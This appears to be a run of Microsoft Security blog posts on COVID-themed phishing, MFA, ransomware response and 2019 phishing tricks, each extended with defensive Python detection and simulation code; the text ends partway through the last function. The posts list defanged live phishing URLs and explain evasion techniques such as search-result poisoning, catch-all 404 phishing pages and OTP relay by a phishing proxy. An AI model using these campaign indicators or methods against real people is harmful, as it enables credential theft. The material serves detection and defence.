Once a file or URL is identified as malicious, the information is shared with other services such as Microsoft Defender Advanced Threat Protection (ATP) to ensure endpoint detection benefits from email detection, and vice versa.

An interesting example of this in action occurred earlier this month, when an attacker launched a spear-phishing campaign that lasted less than 30 minutes.

Attackers crafted an email designed to look like a legitimate supply chain risk report for food coloring additives with an update based on disruptions due to coronavirus. The attachment, however, was malicious and delivered a sophisticated, multi-layer payload based on the Lokibot trojan (Trojan:Win32/Lokibot.GJ!MTB).

Screenshot of a phishing email about a coronavirus update.

Had this payload been successfully deployed, hackers could have used it to steal credentials for other systems—in this case FTP accounts and passwords—which could then be used for further attacks.

Only 135 customer tenants were targeted, with a spray of 2,047 malicious messages, but no customers were impacted by the attack. The Office 365 ATP detonation service, signal-sharing across services, and human analysts worked together to stop it.

And thanks to signal sharing across services, customers who do not use a Microsoft email service like Office 365, hosted Exchange, or Outlook.com, but who run a Windows PC with Microsoft Defender enabled, were fully protected as well. When a user attempted to open the malicious attachment from a non-Microsoft email service, Microsoft Defender queried its cloud-based machine learning models and found that the attachment had already been flagged by an earlier Office 365 ATP cloud detection. The attachment was prevented from executing on the PC and the customer was protected.

What you can do

While bad actors are attempting to capitalize on the COVID-19 crisis, they are using the same tactics they always do. You should be especially vigilant now to take steps to protect yourself.

Make sure your devices have the latest security updates installed and an antivirus or anti-malware service. For Windows 10 devices, Microsoft Defender Antivirus is a free built-in service enabled through Settings. Turn on cloud-delivered protection and automatic sample submission to enable artificial intelligence (AI) and machine learning to quickly identify and stop new and unknown threats.

Enable the protection features of your email service. If you have Office 365, you can learn about Exchange Online Protection here and Office 365 ATP here.

Use multi-factor authentication (MFA) on all your accounts. Most online services now provide a way to use your mobile device or other methods to protect your accounts in this way. Here’s information on how to use Microsoft Authenticator and other guidance on this approach.

MFA support is available as part of the Azure Active Directory (Azure AD) Free offering. Learn more here.

Educate yourself, friends, and colleagues on how to recognize phishing attempts and report suspected encounters. Here are some of the tell-tale signs.

  • Spelling and bad grammar. Cybercriminals are not known for their grammar and spelling. Professional companies or organizations usually have an editorial staff to ensure customers get high-quality, professional content. If an email message is fraught with errors, it is likely to be a scam.
  • Suspicious links. If you suspect that an email message is a scam, do not click on any links. One method of testing the legitimacy of a link is to rest your mouse—but not click—over the link to see if the address matches what was typed in the message. In the following example, resting the mouse on the link reveals the real web address in the box with the yellow background. Note that the string of IP address numbers looks nothing like the company’s web address.

  • Suspicious attachments. If you receive an email with an attachment from someone you don’t know, or an email from someone you do know but with an attachment you weren’t expecting, it may be a phishing attempt, so we recommend you do not open any attachments until you have verified their authenticity. Attackers use multiple techniques to try and trick recipients into trusting that an attached file is legitimate.
    • Do not trust the icon of the attachment.
    • Be wary of multiple file extensions, such as “pdf.exe” or “rar.exe” or “txt.hta”.
    • If in doubt, contact the person who sent you the message and ask them to confirm that the email and attachment are legitimate.
  • Threats. These types of emails cause a sense of panic or pressure to get you to respond quickly. For example, it may include a statement like “You must respond by end of day.” Or saying that you might face financial penalties if you don’t respond.
  • Spoofing. Spoofing emails appear to be connected to legitimate websites or companies but take you to phony scam sites or display legitimate-looking pop-up windows.
  • Altered web addresses. A form of spoofing in which web addresses closely resemble the names of well-known companies but are slightly altered; for example, “www.micorsoft.com” or “www.mircosoft.com”.
  • Incorrect salutation of your name.
  • Mismatches. The link text and the URL are different from one another; or the sender’s name, signature, and URL are different.
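
Several of the signs above (a raw IP address or a different host behind link text that looks like a URL, a lookalike brand domain, a document name ending in an executable extension) can be checked mechanically before a message ever reaches a human. The following Python script is an added example written for this page, not code from the original post or from Microsoft. The brand list, the sample message, and the attachment names are constructed for illustration, and the registrable-domain logic deliberately ignores multi-part public suffixes such as co.uk.

```python
import re
from difflib import SequenceMatcher
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Brands this organization expects to see impersonated (constructed list for the example).
KNOWN_BRANDS = {"microsoft", "outlook", "office", "paypal", "dhl"}
# Final extensions Windows will execute: "invoice.pdf.exe" is a program, not a document.
EXECUTABLE_EXTENSIONS = {"exe", "scr", "hta", "js", "jse", "vbs", "wsf", "cmd", "bat", "ps1", "lnk", "msi"}
# Link text that itself looks like a URL or bare domain, e.g. "www.microsoft.com/account".
URLISH = re.compile(r"^(?:https?://)?[a-z0-9.-]+\.[a-z]{2,}(?:/\S*)?$", re.I)
IPV4 = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}$")


class LinkCollector(HTMLParser):
    """Collect (visible text, href) pairs from an HTML mail body."""

    def __init__(self):
        super().__init__()
        self.links = []
        self._href = None
        self._text = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href = dict(attrs).get("href") or ""
            self._text = []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append(("".join(self._text).strip(), self._href))
            self._href = None


def host_of(url_or_domain: str) -> str:
    """Lower-cased host of a URL or bare domain ('' if none)."""
    s = url_or_domain.strip()
    if "://" not in s:
        s = "http://" + s
    return (urlsplit(s).hostname or "").lower()


def registrable(host: str) -> str:
    """Crude registrable-domain approximation: the last two labels. It ignores
    multi-part public suffixes such as co.uk, which is acceptable for triage."""
    return ".".join(host.split(".")[-2:])


def link_text_mismatch(text: str, href: str) -> bool:
    """Sign: the link text names one site but the href goes to another."""
    if not URLISH.match(text):
        return False
    shown, actual = registrable(host_of(text)), registrable(host_of(href))
    return bool(shown and actual and shown != actual)


def lookalike_brand(host: str):
    """Sign: a host label that is almost, but not exactly, a known brand (micorsoft).
    Returns the brand being imitated, or None."""
    for label in host.split("."):
        if label in KNOWN_BRANDS:
            continue
        for brand in KNOWN_BRANDS:
            close_in_length = abs(len(label) - len(brand)) <= 1
            if close_in_length and SequenceMatcher(None, label, brand).ratio() >= 0.8:
                return brand
    return None


def double_extension(filename: str) -> bool:
    """Sign: two or more extensions where the real (final) one is executable."""
    parts = filename.lower().split(".")
    return len(parts) >= 3 and parts[-1] in EXECUTABLE_EXTENSIONS


def triage(html_body: str, attachment_names):
    """Run the tell-tale-sign checks; return a list of (sign, detail) findings."""
    collector = LinkCollector()
    collector.feed(html_body)
    findings = []
    for text, href in collector.links:
        host = host_of(href)
        if IPV4.match(host):
            findings.append(("raw IP address link", href))
        if link_text_mismatch(text, href):
            findings.append(("link text/URL mismatch", f"{text!r} -> {href}"))
        brand = lookalike_brand(host)
        if brand:
            findings.append(("lookalike domain", f"{host} imitates {brand}"))
    for name in attachment_names:
        if double_extension(name):
            findings.append(("double extension attachment", name))
    return findings


# Constructed sample message for this example; not a real campaign.
SAMPLE_HTML = """
<p>Your mailbox is almost full. <a href="http://198.51.100.23/owa/">www.microsoft.com/account</a></p>
<p>Or <a href="https://www.micorsoft.com/verify">verify your account here</a>.</p>
<p>Unsubscribe: <a href="https://www.microsoft.com/en-us/">https://www.microsoft.com</a></p>
"""
SAMPLE_ATTACHMENTS = ["Q1_invoice.pdf.exe", "notes.txt"]

if __name__ == "__main__":
    for sign, detail in triage(SAMPLE_HTML, SAMPLE_ATTACHMENTS):
        print(f"[{sign}] {detail}")
```

Run against the sample message, the script reports the IP-address link, the text/URL mismatch on the same link, the micorsoft.com lookalike, and the pdf.exe attachment, while the genuine microsoft.com link produces no finding. The similarity threshold is a triage heuristic; a production filter would add a public-suffix list and homoglyph handling.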

If you think you’ve received a phishing email or followed a link in an email that has taken you to a suspicious website, there are a few ways to report what you’ve found.

If you think the mail you’ve received is suspicious:

  • Outlook.com. If you receive a suspicious email message that asks for personal information, select the checkbox next to the message in your Outlook inbox. Select the arrow next to Junk, and then point to Phishing scam.
  • Microsoft Office Outlook 2016 and 2019 and Microsoft Office 365. While in the suspicious message, select Report message in the Protection tab on the ribbon, and then select Phishing.

If you’re on a suspicious website:

  • Microsoft Edge. While you’re on a suspicious site, select the More (…) icon > Send feedback > Report Unsafe site. Follow the instructions on the web page that displays to report the website.
  • Internet Explorer. While you’re on a suspicious site, select the gear icon, point to Safety, and then select Report Unsafe Website. Follow the instructions on the web page that displays to report the website.

If you think you have a suspicious file:

  • Submit the file for analysis.

This is just one area where our security teams at Microsoft are working to protect customers and we’ll share more in the coming weeks. For additional information and best practices for staying safe and productive through remote work, community support and education during these challenging times, visit Microsoft’s COVID-19 resources page for the latest information.

The post Protecting against coronavirus themed phishing attacks appeared first on Microsoft Security.

Changing the Monolith—Part 4: Quick tech wins for a cloud-first world

February 13th, 2020 No comments

You may have heard that identity is the “new” perimeter. Indeed, with the proliferation of phishing attacks over the past few years, one of the best ways to secure data is to ensure that identity—the primary way we access data—can be trusted.

How do we secure identity?

Start by evaluating how users are authenticating to all applications inside and outside the organization. I say all applications, because it doesn’t take much effort for a hacker to pivot from a low-value, non-sensitive application to a high-value and highly-sensitive application, quickly gaining access to confidential or restricted data.

Similarly, Multi-Factor Authentication (MFA) must be enforced for all users as well, not just highly privileged users. Remember that it is simple for bad actors to pass-the-hash, run a Golden Ticket Attack, or use other techniques to elevate their privileges and gain access to sensitive data.

Modern authentication encourages us to reduce reliance on legacy authentication methods, including NTLM and on-premises Kerberos, whose credential material can be stolen and replayed in the pass-the-hash and Golden Ticket attacks mentioned above. It also requires more than one factor of authentication for all users. The factors are something you know (a password or PIN), something you have (a hardware token, or a soft token or authenticator app that generates one-time passwords), or something you are (biometrics like 3D facial recognition or fingerprint matching).

Image of a worker approving a sign-in from his phone.

Start with MFA.

Requiring MFA for all applications, whether on-premises or in the cloud, is a great start. When using MFA, prefer an authenticator app or a one-time password mechanism over text-back codes or phone calls: SMS and voice can be intercepted through SIM swapping or carrier spoofing, while an app-generated code never crosses the phone network. Note, however, that any code a user types can still be relayed in real time by a phishing proxy sitting between the user and the genuine sign-in page, so these methods reduce phishing risk rather than eliminate it.

The least vulnerable MFA mechanisms include FIDO2, which uses a platform biometric or a USB hardware token like a YubiKey and binds each credential to the legitimate site’s origin, so an assertion captured on a lookalike domain is useless to the attacker, and risk-based (machine learning) systems that grant conditional access based on Zero Trust principles and time-of-authentication context.
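
To make the difference between a relayable code and an origin-bound credential concrete, the following Python is an added example written for this page, not code from the original post or from Microsoft. It models a real-time phishing proxy against two second factors: a TOTP code (RFC 6238) and a simplified WebAuthn/FIDO2 assertion. The relying party name login.example.com, the proxy origin, the TOTP seed, and the reduced browser/authenticator model are assumptions for illustration. The relying-party checks shown (challenge, origin, rpIdHash, user-presence flag) are the ones that give FIDO2 its phishing resistance; signature verification over the same bytes would follow them and is left out here.

```python
import base64
import hashlib
import hmac
import json
import secrets
import struct
from urllib.parse import urlsplit

# Assumed relying party (RP) for this example.
RP_ID = "login.example.com"
ALLOWED_ORIGINS = {"https://login.example.com"}
PHISHING_ORIGIN = "https://login-example-com.evil.test"   # constructed lookalike proxy


def b64url(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()


# --- TOTP (RFC 6238, SHA-1): a code the user types carries no notion of WHERE it was typed ---
def totp(secret: bytes, unix_time: int, step: int = 30, digits: int = 6) -> str:
    counter = struct.pack(">Q", unix_time // step)
    mac = hmac.new(secret, counter, hashlib.sha1).digest()
    offset = mac[-1] & 0x0F
    code = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % 10 ** digits).zfill(digits)


def server_checks_totp(secret: bytes, submitted: str, unix_time: int) -> bool:
    """The server sees only the digits; a proxy that relays them within the window passes."""
    return hmac.compare_digest(submitted, totp(secret, unix_time))


# --- WebAuthn/FIDO2: origin and RP ID are baked into the data the authenticator signs -------
def browser_get_assertion(page_origin: str, rp_id: str, challenge: bytes):
    """Simplified browser + authenticator. A browser refuses an rpId that is not a
    registrable suffix of the page's host and records the real page origin in clientDataJSON."""
    host = urlsplit(page_origin).hostname or ""
    if not (host == rp_id or host.endswith("." + rp_id)):
        raise PermissionError(f"SecurityError: rpId {rp_id!r} not valid for origin {page_origin!r}")
    client_data_json = json.dumps(
        {"type": "webauthn.get", "challenge": b64url(challenge), "origin": page_origin}
    ).encode()
    # authenticatorData = rpIdHash(32) || flags(1) || signCount(4); flags 0x05 = UP | UV
    authenticator_data = hashlib.sha256(rp_id.encode()).digest() + b"\x05" + (1).to_bytes(4, "big")
    # The authenticator would sign authenticatorData || SHA-256(clientDataJSON) with the
    # credential's private key; key handling and the signature are out of scope here.
    return client_data_json, authenticator_data


def rp_verify_assertion(client_data_json: bytes, authenticator_data: bytes, expected_challenge: bytes):
    """Relying-party checks that make the credential phishing-resistant.
    Signature verification over the same bytes would follow these checks."""
    cd = json.loads(client_data_json)
    if cd.get("type") != "webauthn.get":
        return False, "wrong ceremony type"
    if cd.get("challenge") != b64url(expected_challenge):
        return False, "challenge mismatch or replay"
    if cd.get("origin") not in ALLOWED_ORIGINS:
        return False, f"origin {cd.get('origin')!r} is not the RP's origin"
    if authenticator_data[:32] != hashlib.sha256(RP_ID.encode()).digest():
        return False, "rpIdHash does not match this RP"
    if not authenticator_data[32] & 0x01:
        return False, "user presence flag not set"
    return True, "ok"


def demo():
    # 1. Relayed OTP: the victim types the code on the fake page, the proxy forwards it,
    #    and the real server has no way to tell.
    seed = b"12345678901234567890"          # constructed shared secret
    now = 1_700_000_000
    relayed_code = totp(seed, now)
    otp_accepted = server_checks_totp(seed, relayed_code, now)

    # 2. Same victim with a FIDO2 key on the genuine page: passes.
    challenge = secrets.token_bytes(32)
    cd, ad = browser_get_assertion("https://login.example.com", RP_ID, challenge)
    legit_result = rp_verify_assertion(cd, ad, challenge)

    # 3. On the proxy's origin the browser will not mint an assertion for our rpId at all,
    #    and an assertion for the proxy's own rpId fails the RP's origin/rpIdHash checks.
    try:
        browser_get_assertion(PHISHING_ORIGIN, RP_ID, challenge)
        browser_refused = False
    except PermissionError:
        browser_refused = True
    cd2, ad2 = browser_get_assertion(PHISHING_ORIGIN, urlsplit(PHISHING_ORIGIN).hostname, challenge)
    phished_result = rp_verify_assertion(cd2, ad2, challenge)
    return otp_accepted, legit_result, browser_refused, phished_result


if __name__ == "__main__":
    print(demo())
```

The relayed TOTP is accepted because nothing in six digits says which page collected them; the FIDO2 flow fails twice over, first because the browser refuses to produce an assertion for a foreign rpId, then because anything the proxy can obtain names its own origin in clientDataJSON.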

Here is the context commonly evaluated by machine learning authentication systems:

  • Can an authentication token be obtained?
  • Does the user have a valid username, password, and a second form of authentication (MFA), like a biometric validation (fingerprint or 3D facial recognition) through an authenticator app?
  • What is the risk score of the user?
  • Is the user authenticating from two places at nearly the same time (Impossible Traveler)?
  • Has the user’s password been discovered on the Dark Web because of an account and password database breach?
  • Is this a reasonable time for the user to be signed in based upon past behavior?
  • Is the user signing-in from an anonymous source like a Tor exit node?
  • What is the risk score of the device?
  • Has the device experienced unresolved risk in the last several days?
  • Has the machine been exposed to malware?
  • Is the machine running a high-risk application?
  • Are the antimalware signatures up to date?
  • Are all the critical and high software patches applied?
  • Are there sensitive documents on the device?
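
Several of the signals in this list can be expressed as straightforward checks over sign-in telemetry. The Python below is an added example written for this page, not code from the original post or from any Microsoft product, and it goes slightly beyond the list by combining the signals into a single conditional-access decision. The Tor exit-node list, the leaked-password corpus, the sign-in events, and the score weights and thresholds are all constructed for illustration; in a real system the reference data comes from threat-intelligence feeds and the weights from tuning against your own tenant's history.

```python
import hashlib
import math
from dataclasses import dataclass
from datetime import datetime, timezone


@dataclass(frozen=True)
class SignIn:
    user: str
    time: datetime
    ip: str
    lat: float
    lon: float


# Constructed reference data for this example; production systems pull these from
# threat-intelligence and breach-corpus feeds.
TOR_EXIT_IPS = {"198.51.100.7"}
BREACHED_PASSWORD_SHA1 = {
    hashlib.sha1(p.encode()).hexdigest().upper() for p in ("Winter2020!", "Password1")
}
MAX_PLAUSIBLE_SPEED_KMH = 900.0   # roughly airliner cruise speed
GEO_NOISE_KM = 50.0               # IP geolocation jitter within one metro area


def haversine_km(lat1, lon1, lat2, lon2):
    """Great-circle distance in km between two points on a spherical Earth."""
    r = 6371.0
    p1, p2 = math.radians(lat1), math.radians(lat2)
    dphi, dlmb = math.radians(lat2 - lat1), math.radians(lon2 - lon1)
    a = math.sin(dphi / 2) ** 2 + math.cos(p1) * math.cos(p2) * math.sin(dlmb / 2) ** 2
    return 2 * r * math.asin(math.sqrt(a))


def impossible_travel(prev: SignIn, cur: SignIn) -> bool:
    """Two sign-ins farther apart than anyone could have travelled in the elapsed time."""
    km = haversine_km(prev.lat, prev.lon, cur.lat, cur.lon)
    if km < GEO_NOISE_KM:
        return False
    hours = (cur.time - prev.time).total_seconds() / 3600.0
    if hours <= 0:
        return True                      # same instant, different continent
    return km / hours > MAX_PLAUSIBLE_SPEED_KMH


def password_is_breached(password: str) -> bool:
    """Compare the SHA-1 of the candidate password against the leaked-hash corpus
    (the hashing convention the Have I Been Pwned corpus uses)."""
    return hashlib.sha1(password.encode()).hexdigest().upper() in BREACHED_PASSWORD_SHA1


def risk_score(history, cur: SignIn, typical_hours, password=None):
    """Combine the context signals into a 0-100 score plus the reasons that fired."""
    score, reasons = 0, []
    if cur.ip in TOR_EXIT_IPS:
        score += 40
        reasons.append("anonymizer (Tor exit node)")
    if history and impossible_travel(history[-1], cur):
        score += 40
        reasons.append("impossible travel")
    if cur.time.hour not in typical_hours:
        score += 10
        reasons.append("atypical sign-in hour")
    if password is not None and password_is_breached(password):
        score += 30
        reasons.append("credential present in breach corpus")
    return min(score, 100), reasons


def decision(score: int) -> str:
    """Conditional-access style outcome; thresholds are illustrative."""
    if score >= 70:
        return "block"
    if score >= 30:
        return "require MFA"
    return "allow"


def demo():
    utc = timezone.utc
    typical_hours = set(range(8, 19))   # this user normally signs in 08:00-18:59 UTC
    seattle = SignIn("alice", datetime(2020, 2, 13, 9, 0, tzinfo=utc), "203.0.113.10", 47.61, -122.33)
    portland = SignIn("alice", datetime(2020, 2, 13, 14, 0, tzinfo=utc), "203.0.113.44", 45.52, -122.68)
    sydney_tor = SignIn("alice", datetime(2020, 2, 13, 9, 40, tzinfo=utc), "198.51.100.7", -33.87, 151.21)
    routine = risk_score([seattle], portland, typical_hours)
    suspicious = risk_score([seattle], sydney_tor, typical_hours, password="Winter2020!")
    return routine, suspicious


if __name__ == "__main__":
    for label, (score, reasons) in zip(("routine", "suspicious"), demo()):
        print(f"{label}: score={score} decision={decision(score)} reasons={reasons}")
```

The Seattle-to-Portland pair is about 230 km in five hours and passes; the Seattle-to-Sydney pair is roughly 12,500 km in forty minutes from a Tor exit node with a leaked password, which saturates the score and blocks the sign-in. Geolocation noise, VPN egress points and shared corporate NAT are the usual sources of false positives for the travel check, which is why a distance floor and a generous speed limit are built in.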

Enforcing a single, unified MFA scheme reduces the success of phishing attacks that rely on password reuse or social engineering. With web-based Authentication-as-a-Service (AaaS) offerings, MFA is straightforward to implement across the enterprise. Modern operating systems now support strong, device-bound sign-in out of the box, including Windows Hello on Windows 10 and the biometric unlock on macOS, iOS, and Android. Most modern on-premises and cloud applications can consume SSO standards such as SAML or OpenID Connect for authentication and OAuth 2.0 for authorization.

Moving toward a secure SSO posture

Implementing a single identity source for all applications leads the organization to a better and less time-consuming and complicated user experience, and an arguably more secure SSO posture by:

  • Reducing the number of passwords that users need to remember or save—quite often insecurely—to access their applications.
  • Introducing pass-through authentication and authorization, so that once a user authenticates to an operating system, they have unprompted access to both on-premises and cloud apps, using the same security token created when they signed in to the operating system using MFA.
  • Reducing the threat of untimely termination/missed identity decommissioning by decreasing “identity sprawl,” which is what you encounter when your organization has multiple identities in multiple applications per user. That is sometimes the result of non-integrated entities or not yet integrated entities and affiliates. B2B approaches to SSO can be explored to solve the problems associated with not integrating a business unit or operating group into the organization’s core directory.

Image of a hand hovering over a keyboard.

Considering user satisfaction is critical.

MFA and SSO together increase user satisfaction, making the CISO a business enabler rather than a productivity and collaboration roadblock. Cloud-based MFA and SSO directory systems have been shown to be more available than on-premises directory or federation services, with many cloud providers offering 99.9 percent uptime. A three-nines Service Level Agreement (SLA) is challenging to achieve on-premises with limited IT staff and budget!

Stay tuned

Stay tuned for the next installment of my Changing the Monolith series. In the meantime, check out the first three posts in the series:

Also, bookmark the Security blog to keep up with our expert coverage on security matters and follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

The post Changing the Monolith—Part 4: Quick tech wins for a cloud-first world appeared first on Microsoft Security.

Ransomware response—to pay or not to pay?

December 16th, 2019 No comments

The increased connectivity of computers and the growth of Bring Your Own Device (BYOD) in most organizations is making the distribution of malicious software (malware) easier. Unlike other types of malicious programs that may usually go undetected for a longer period, a ransomware attack is usually experienced immediately, and its impact on information technology infrastructure is often irreversible.

As part of Microsoft’s Detection and Response Team (DART) Incident Response engagements, we regularly get asked by customers about “paying the ransom” following a ransomware attack. Unfortunately, this situation often leaves most customers with limited options, depending on the business continuity and disaster recovery plans they have in place.

The two most common options are either to pay the ransom (with the hopes that the decryption key obtained from the malicious actors works as advertised) or switch gears to a disaster recovery mode, restoring systems to a known good state.

The unfortunate truth is that most organizations are left with paying the ransom as their only option, because rebuilding is taken off the table by a lack of known good backups or because the ransomware also encrypted those backups. Moreover, a growing list of municipalities around the U.S. has seen their critical infrastructure, as well as their backups, targeted by ransomware, a move by threat actors to better guarantee a payday.

We never encourage a ransomware victim to pay any form of ransom demand. Paying a ransom is often expensive, dangerous, and only refuels the attackers’ capacity to continue their operations; bottom line, this equates to a proverbial pat on the back for the attackers. The most important thing to note is that paying cybercriminals to get a ransomware decryption key provides no guarantee that your encrypted data will be restored.

So, what options do we recommend? The fact remains that every organization should treat a cybersecurity incident as a matter of when it will happen and not whether it will happen. Having this mindset helps an organization react quickly and effectively to such incidents when they happen. Two major industry standard frameworks, the Sysadmin, Audit, Network, and Security (SANS) and the National Institute of Standards and Technology (NIST), both have published similar concepts on responding to malware and cybersecurity incidents. The bottom line is that every organization needs to be able to plan, prepare, respond, and recover when faced with a ransomware attack.

Outlined below are steps designed to help organizations better plan and prepare to respond to ransomware and major cyber incidents.

How to plan and prepare to respond to ransomware

1. Use an effective email filtering solution

According to the Microsoft Security Intelligence Report Volume 24 of 2018, spam and phishing emails are still the most common delivery method for ransomware infections. To stop ransomware at its entry point, every organization needs an email security service that scans all email content and headers entering and leaving the organization for spam, viruses, and other advanced malware threats. An enterprise-grade email protection solution blocks most such threats at ingress and egress.

2. Regular hardware and software systems patching and effective vulnerability management

Many organizations are still failing to adopt one of the age-old cybersecurity recommendations and most important defenses against attack: applying security updates and patches as soon as the software vendors release them. A prominent example of this failure was the WannaCry ransomware outbreak of 2017, one of the largest global cybersecurity attacks in the history of the internet, which spread using a leaked exploit (EternalBlue) for a vulnerability in the Windows Server Message Block (SMB) protocol for which Microsoft had released a patch (MS17-010) nearly two months before the first publicized incident. Regular patching and an effective vulnerability management program are important measures against ransomware and other forms of malware, and they are steps in the right direction to ensure an organization does not become a victim.

3. Use up-to-date antivirus and an endpoint detection and response (EDR) solution

While owning an antivirus solution alone does not ensure adequate protection against viruses and other advanced threats, it is very important to keep antivirus solutions current with their vendors’ releases. Attackers invest heavily in creating new malware and exploits, while vendors are left playing catch-up by releasing daily signature updates. Complementary to an up-to-date antivirus solution is an EDR solution, which collects and stores large volumes of data from endpoints and provides real-time, host-based, file-level monitoring and visibility. The data sets and alerts it generates help stop advanced threats and are routinely used when responding to security incidents.

4. Separate administrative and privileged credentials from standard credentials

Working as a cybersecurity consultant, one of the first recommendations I usually provide to customers is to separate their system administrative accounts from their standard user accounts and to ensure those administrative accounts are not useable across multiple systems. Separating these privileged accounts not only enforces proper access control but also ensures that a compromise of a single account doesn’t lead to the compromise of the entire IT infrastructure. Additionally, using Multi-Factor Authentication (MFA), Privileged Identity Management (PIM), and Privileged Access Management (PAM) solutions are ways to effectively combat privileged account abuse and a strategic way of reducing the credential attack surface.

5. Implement an effective application whitelisting program

It’s very important as part of a ransomware prevention strategy to restrict the applications that can run within an IT infrastructure. Application whitelisting ensures only applications that have been tested and approved by an organization can run on the systems within the infrastructure. While this can be tedious and presents several IT administrative challenges, this strategy has been proven effective.

6. Regularly back up critical systems and files

The ability to recover to a known good state is the most critical strategy of any information security incident plan, especially for ransomware. Therefore, to ensure the success of this process, an organization must validate that all its critical systems, applications, and files are regularly backed up and that those backups are regularly tested to ensure they are recoverable. Ransomware is known to encrypt or destroy any file it comes across, often irrecoverably; consequently, it is of utmost importance that all impacted files can be recovered from a good backup kept where the ransomware cannot reach it: offline, immutable, or at a secondary location whose credentials are separate from the production environment. Because attackers increasingly seek out and destroy backups before triggering encryption, a backup that is writable with domain administrator credentials should not be counted as a recovery path.

Learn more and keep updated

Learn more about how DART helps customers respond to compromises and become cyber-resilient. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

The post Ransomware response—to pay or not to pay? appeared first on Microsoft Security.

The quiet evolution of phishing

December 11th, 2019 No comments

The battle against phishing is a silent one: every day, Office 365 Advanced Threat Protection detects millions of distinct malicious URLs and email attachments. Every year, billions of phishing emails don’t ever reach mailboxes—real-world attacks foiled in real-time. Heuristics, detonation, and machine learning, enriched by signals from Microsoft Threat Protection services, provide dynamic, robust protection against email threats.

Phishers have been quietly retaliating, evolving their techniques to try and evade these protections. In 2019, we saw phishing attacks reach new levels of creativity and sophistication. Notably, these techniques involve the abuse of legitimate cloud services like those offered by Microsoft, Google, Amazon, and others. At Microsoft, we have aggressive processes to identify and take down nefarious uses of our services without affecting legitimate applications.

In this blog we’ll share three of the most notable attack techniques we spotted this year. We uncovered these attacks while studying Office 365 ATP signals, which we use to track and deeply understand attacker activity and build durable defenses against evolving and increasingly sophisticated email threats.

Hijacked search results lead to phishing

Over the years, phishers have become better at evading detection by hiding malicious artifacts behind benign ones. This tactic manifests in, among many others, the use of URLs that point to legitimate but compromised websites or multiple harmless-looking redirectors that eventually lead to phishing.

One clever phishing campaign we saw in 2019 used links to Google search results that were poisoned so that they pointed to an attacker-controlled page, which eventually redirected to a phishing page. A traffic generator ensured that the redirector page was the top result for certain keywords.

Figure 1. Phishing attack that used poisoned search results

Using this technique, phishers were able to send phishing emails that contained only legitimate URLs (i.e., links to search results), and on a trusted domain at that, for example:

  • hxxps://www[.]google[.]ru/#btnI&q=%3Ca%3EhOJoXatrCPy%3C/a%3E
  • hxxps://www[.]google[.]ru/#btnI&q=%3Ca%3EyEg5xg1736iIgQVF%3C/a%3E

The campaign was made even stealthier by its use of location-specific search results. When accessed by users in Europe, the phishing URL led to the redirector website c77684gq[.]beget[.]tech, and eventually to the phishing page. Outside Europe, the same URL returned no search results.

For this to work, attackers had to make sure that their website, c77684gq[.]beget[.]tech, was the top search result for the keyword “hOJoXatrCPy” when queried from certain regions. The website’s HTML code is composed of a redirector script and a series of anchor elements:

Figure 2. Redirector code

These anchor elements were designed to be crawled by search engines so that the page is indexed and returned as result for the search keywords that attackers wanted to use for their campaign.

Figure 3. Anchor tags containing search keywords

The attackers then set up a traffic generator to poison the search results. Because the phishing URL invoked Google’s “I’m Feeling Lucky” behavior (the btnI parameter), which sends the browser straight to the top result instead of displaying a results page, the victim landed directly on the redirector page.

404 Not Found pages customized to be phishing sites

Another way that phishers evade detection is to use multiple URLs and sometimes even multiple domains for their campaigns. They use techniques like subdomain generation algorithms to try to stay ahead of security solutions, which, without the right dynamic technologies, are forced to continually catch up as phishers generate more and more domains and URLs.

This year, attackers have found another shrewd way to serve phishing: custom 404 pages. We uncovered a phishing campaign targeting Microsoft that used 404 pages crafted as phishing pages, which gave phishers virtually unlimited phishing URLs.

Figure 4. Phishing attack that uses specially crafted 404 Not Found error page

The custom 404 page was designed to look like the legitimate Microsoft account sign-in page.

Figure 5. 404 page designed as phishing page

Because the custom 404 page is served for any non-existent path on the attacker-controlled domain, the phishers could use random URLs for their campaigns. For example, we saw these two URLs used in phishing campaigns; the attackers added a single character to the second one to generate a new URL that serves the same phishing page:

  • hxxps://skype-online8024[.]web[.]app/8cc1083b0ffdf1e5b9594c045c825b02d41d8cd98f00b204e9800998ecf8427e#ZG1jY2FubkBtb3Jicm9zLmNvbQ
  • hxxps://skype-online8024[.]web[.]app/8cc1083b0ffdf1e5b9594c045c825b02d41d8cd98f00b204e9800998ecf8427e#ZG1jY2FubkBtb3Jicm9zLmNvbQs

We also found that the attackers randomized domains, further multiplying the number of distinct phishing URLs:

  • outlookloffice365usertcph4l3q[.]web[.]app
  • outlookloffice365userdqz75j6h[.]web[.]app
  • outlookloffice365usery6ykxo07[.]web[.]app

All of these non-existent URLs returned the 404 error page, i.e., the phishing page:

Figure 6. When phishing URL is accessed, server responds with HTTP 404 error message, which is a phishing page
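
Both techniques above share a lesson for the analyst: the URL a victim receives is not the URL that matters. The Python below is an added example written for this page, not code from the original post or from Microsoft. It refangs reported indicators, extracts the poisoned keyword from the btnI search-redirector URLs, collapses hash-like paths and clusters the randomized web.app hosts so the campaign shows up as one object rather than dozens of URLs. The Google and web.app hosts and paths are the ones quoted on this page; the fragment on the web.app URLs is a constructed base64url token (user@example.com), and the observation that kits often carry the target's address in the fragment is a general one, not a claim from this post.

```python
import base64
import os
import re
from urllib.parse import parse_qs, urlsplit

GOOGLE_HOST = re.compile(r"^(?:www\.)?google\.[a-z.]+$")
HEX_BLOB = re.compile(r"^[0-9a-f]{32,64}$")          # md5- to sha256-sized hex path segments
B64URL = re.compile(r"^[A-Za-z0-9_-]{8,}$")


def refang(indicator: str) -> str:
    """Turn a defanged indicator (hxxps://www[.]example[.]com) back into a real URL."""
    return indicator.replace("hxxp", "http").replace("[.]", ".").replace("[:]", ":")


def search_redirector_keyword(url: str):
    """If the URL is a Google 'I'm Feeling Lucky' link (btnI present), return the search
    keyword whose top result the browser will be sent to; otherwise None. The campaign put
    the parameters in the fragment (#btnI&q=...), so both query and fragment are inspected."""
    parts = urlsplit(url)
    if not GOOGLE_HOST.match(parts.hostname or ""):
        return None
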